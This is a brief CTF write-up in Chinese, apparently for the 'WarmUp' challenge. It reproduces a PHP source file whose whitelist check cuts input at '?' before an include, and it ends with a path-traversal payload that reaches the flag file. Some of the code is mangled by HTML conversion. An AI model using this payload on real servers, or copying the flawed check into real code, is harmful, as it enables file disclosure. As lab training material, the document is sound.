打开网站
查看源码
访问source.php文件,开始代码审计
<!--?php
highlight_file(__FILE__);
class emmm
{
public static function checkFile(&$page)
{
$whitelist = ["source"=-->"source.php","hint"=>"hint.php"];
if (! isset($page) || !is_string($page)) {
echo "you can't see it";
return false;
}
if (in_array($page, $whitelist)) {
return true;
}
$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?') //截取问号前面的子串
);
if (in_array($_page, $whitelist)) {
return true;
}
$_page = urldecode($page);
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
echo "you can't see it";
return false;
}
}
if (! empty($_REQUEST['file']) //file参数值不是null、并且file参数值符合is_string()函数、并且符合emmm::checkFile()
&& is_string($_REQUEST['file'])
&& emmm::checkFile($_REQUEST['file'])
) {
include $_REQUEST['file']; //最终的目标
exit;
} else {
echo "<br><img src="\" https:="" i.loli.net="" 2018="" 11="" 01="" 5bdb0d93dc794.jpg\""="">";
}
?>
source.php?file=hint.php
?file=hint.php?../../../../../../ffffllllaaaagggg